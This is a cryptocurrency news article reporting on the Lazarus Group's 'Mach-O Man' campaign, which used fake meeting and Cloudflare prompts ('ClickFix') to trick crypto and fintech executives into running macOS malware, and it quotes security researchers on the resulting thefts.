COINTURK NEWSCOINTURK NEWSCOINTURK NEWS
  • Crypto Tracker App
  • Bitcoin
  • Altcoin
  • Ethereum
  • Advertise
  • Contact
  • TURTURTUR
  • ESESES
Search
© 2024 COINTURK NEWS. All Rights Reserved.
Reading: Lazarus steals $500 million in new BTC heist
Share
Font ResizerAa
COINTURK NEWSCOINTURK NEWS
Font ResizerAa
Search
  • Crypto Tracker App
  • Bitcoin
  • Altcoin
  • Ethereum
  • Advertise
  • Contact
  • TURTURTUR
  • ESESES
Follow US
© 2025 >> COINTURK NEWS
Powered by LK SOFTWARE
COINTURK NEWS > Cryptocurrency Security > Lazarus steals $500 million in new BTC heist
Cryptocurrency Security

Lazarus steals $500 million in new BTC heist

In Brief

  • 🚨 Lazarus Group stole $500 million in digital assets with Mach-O Man.

  • Attacks targeted executives in $BTC, fintech, and DeFi sectors using advanced malware.

  • Critical data: Hackers exploited social engineering tactics that slipped past standard security.

Ömer Ergin
Ömer Ergin 2 hours ago
Share
SHARE

Lazarus Group, a cybercrime syndicate long associated with North Korea, is shifting its focus from traditional banking heists to major attacks on the cryptocurrency and fintech industries. Since 2017, analysts estimate Lazarus has been responsible for thefts totaling $6.7 billion. The group’s latest operation, dubbed “Mach-O Man,” is specifically targeting executives and businesses across digital finance, exploiting new vulnerabilities to access vast sums in digital assets.

Contents
Mach-O Man targets crypto and fintech leadersHow ClickFix social engineering exploits workDeFi projects face heightened risks

Mach-O Man targets crypto and fintech leaders

Natalie Newson, a blockchain security expert at CertiK, has been closely monitoring Lazarus Group’s operations within crypto and fintech. In just the last two weeks, Lazarus stole upwards of $500 million in digital assets from platforms such as Drift and KelpDAO. Investigators stress that the Mach-O Man campaign is not an isolated incident but a coordinated mission backed and orchestrated at the state level by North Korea.

This sophisticated approach singles out both institutions and top executives in crypto and finance. Experts now see North Korea’s digital theft as a systemic, state-run revenue source. There is also growing concern among security professionals that variations of the Mach-O Man technique could be adopted by other criminal organizations worldwide.

How ClickFix social engineering exploits work

The hallmark of the Mach-O Man attack is its use of modular macOS malware, developed by Lazarus’s “Chollima” subunit and designed to compromise crypto and fintech applications on Apple systems. According to Newson, the malware is delivered through a targeted social engineering ploy known as “ClickFix.”

Attackers contact executives via Telegram, sending urgent meeting requests. Victims are then redirected to deceptively authentic sites mimicking known platforms like Zoom, Microsoft Teams, or Google Meet. They are told connection issues require them to paste a provided command into their terminal, unwittingly granting hackers direct access to corporate systems and financial assets.

Newson explains that “the page appears entirely legitimate, and the instructions seem routine—the victim initiates the action themselves, so conventional security checks rarely detect the attack.”

DeFi projects face heightened risks

Mach-O Man’s sophistication has raised alarm throughout the sector, posing serious threats to both organizations and individuals—particularly in the DeFi landscape. Security researcher Vladimir S. reports that attackers have even seized control of DeFi project domains, replacing original websites with fraudulent Cloudflare prompts that instruct users to execute malicious commands for “authentication.”

This tactic leverages convincing prompts so well that most users, including senior staff, comply without hesitation, inadvertently opening the door for total platform compromise. The malware is engineered to erase itself rapidly, leaving virtually no digital footprints and making forensic tracing extremely difficult.

Newson observes, “Most victims never realize they’ve been breached. Even if they do, it’s almost impossible to identify which variant infiltrated their systems.”

Specialists warn that Lazarus Group’s attacks are no longer episodic news items—they now represent a persistent, high-stakes threat to the entire crypto ecosystem. Those active within fintech and digital currency realms are urged to increase both technical and social vigilance to preempt future incursions.

You can follow our news on Telegram, Facebook & Coinmarketcap & X
Disclaimer: The information contained in this article does not constitute investment advice. Investors should be aware that cryptocurrencies carry high volatility and therefore risk, and should conduct their own research.

You Might Also Like

Armed thieves steal €700,000 in crypto in France

Sui-based voLO protocol hacked, $3.5 million lost from vaults

Kelp DAO hack triggers $293 million DeFi loss

Cosmos hit by $8 billion node freeze vulnerability

Kelp DAO attacker moves $176 million in ETH to new networks

Ömer Ergin 22 April, 2026 - 4:34 pm 22 April, 2026 - 4:34 pm
Share This Article
Facebook Twitter
Share
Previous Article Bitcoin jumps 2.4% to $78,292 as 2026 forecasts hit $250,000
Next Article Btc surges past 78,000 dollars as truce extended
Leave a comment

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Stay Connected

8.1k Like
21.1k Follow
1.1k Follow

Latest News

Armed thieves steal €700,000 in crypto in France
Cryptocurrency Law Cryptocurrency Security
Dogecoin tops $0.0950 as bulls eye $0.10 breakout
Dogecoin (DOGE)
Bitcoin targets $80,400 as Middle East tensions spike
Bitcoin (BTC) Cryptocurrency News
//

COINTURK was launched in March 2014 by a group of technology enthusiasts who believe that Bitcoin will be as important as the internet in the world of the future thanks to the amazing technology underlying it.

CRYPTOCURRENCY LIVE PRICES

  • Bitcoin (BTC) Live Price
  • Ethereum (ETH) Live Price
  • Ripple (XRP) Live Price
  • Solana (SOL) Live Price
  • Dogecoin (DOGE) Live Price
  • Cardano (ADA) Live Price
  • Chainlink (LINK) Live Price

OUR PARTNERS

  • COINMARKETCAP
  • COINGECKO
  • BITCOINHABER
  • BH NEWS
  • 21MILYON
  • NEWSLINKER

OUR COMPANY

  • About Us
  • Cookie Policy
  • Advertising
  • Contact
COINTURK NEWSCOINTURK NEWS
Follow US
COINTURK NEWS 2026
Powered by LK SOFTWARE
Welcome Back!

Sign in to your account

Lost your password?